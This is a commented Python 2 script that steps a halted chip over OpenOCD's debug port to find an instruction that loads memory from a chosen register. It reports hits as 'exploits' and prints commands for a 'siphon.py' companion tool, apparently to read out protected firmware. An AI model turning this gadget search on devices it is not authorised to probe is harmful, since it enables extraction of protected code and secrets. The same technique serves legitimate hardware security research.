#!/usr/bin/python
"""Probe a halted target over OpenOCD's telnet port for an instruction that
behaves like ``LDR Rj, [Rk]`` near the current program counter.

The script drives the target purely through the debug interface (register
reads/writes and single-steps via the ``helpers`` module, not shown here); it
only works while an OpenOCD session is reachable on localhost:4444 and the
target's debug port is open.

NOTE(review): written for Python 2 -- ``xrange`` is used below, and on
Python 3 ``telnetlib.Telnet.write`` expects bytes, not ``str``.
"""
import sys  # only referenced from the commented-out exit path below
import telnetlib
import helpers

print("Connecting to Open OCD server at localhost:4444")
# Plain telnet to OpenOCD's command console; the connection is never
# explicitly closed, only an "exit" command is sent at the end.
tn = telnetlib.Telnet("localhost", 4444)
print("Searching for LDR exploits")
# helpers.find_pcs is assumed to return (program counter, banked MSP) --
# both printed below; verify against helpers.py.
pc, msp = helpers.find_pcs(tn)
print("Program counter is " + hex(pc))
print("Program counter (banked) is " + hex(msp))
# Scan window: 0x100 bytes forward from the current pc, 4 bytes at a time
# (the step of 4 assumes 32-bit instruction alignment -- TODO confirm).
pc_start = pc
pc_end = pc + 0x100
print("Testing pc from " + hex(pc_start) + " up to " + hex(pc_end))
for i in xrange(pc_start, pc_end, 4):
    # Reset the core state for each candidate address: halt, point pc at the
    # candidate, clear all registers, then execute exactly one instruction.
    helpers.halt(tn)
    print("Setting program counter to " + hex(i))
    helpers.reg_set(tn, "pc", i)
    helpers.reg_set_all(tn, 0)
    helpers.step(tn)
    # First pass: with every register zeroed, look for an r0..r12 that now
    # holds the MSP value -- taken as a sign the instruction loaded it.
    for j in range(0, 13):
        val = helpers.reg_get(tn, "r" + str(j))
        if val == msp:
            print("Found candidate: r" + str(j) + " == " + hex(msp) + " (MSP)")
            # Second pass: perturb one other register at a time (set it to 4)
            # and re-run the same instruction; if r<j> changes, its value
            # depends on r<k>, which the script reports as an
            # approximate "LDR R<j>, [R<k>]".
            for k in range(0, 13):
                if k != j:
                    helpers.reg_set(tn, "pc", i)
                    helpers.reg_set_all(tn, 0)
                    helpers.reg_set(tn, "r" + str(k), 4)
                    helpers.step(tn)
                    newval = helpers.reg_get(tn, "r" + str(j))
                    if newval != val:
                        print("Exploit found at pc=" + hex(i) + ": approx. LDR R" + str(j) + ", [R" + str(k) + "]")
                        # helpers.siphon's return value is printed as hex;
                        # its meaning is not visible from this file.
                        print("Assenbly: " + hex(helpers.siphon(tn, i, i, k, j)))
                        print("CLI: ./siphon.py " + hex(i) + " " + str(k) + " " + str(j))
                        # Early exit is disabled, so the scan continues over
                        # the whole window and may report several hits.
                        # tn.write("exit\n")
                        # sys.exit()
# Reached unconditionally (no early exit above), so "No exploits found" is
# printed even when candidates were reported during the scan.
tn.write("exit\n")
print("No exploits found")